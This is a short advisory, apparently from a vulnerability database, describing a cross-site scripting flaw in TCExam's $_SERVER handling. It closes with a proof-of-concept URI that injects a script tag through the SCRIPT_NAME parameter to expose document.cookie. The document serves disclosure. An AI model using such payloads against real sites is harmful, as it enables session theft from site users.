TCExam $_SERVER[] Cross-Site Scripting Vulnerability

TCExam $_SERVER[] Cross-Site Scripting Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/[path]/public/code/index.php?_SERVER[SCRIPT_NAME]="><script>alert(document.cookie)</script>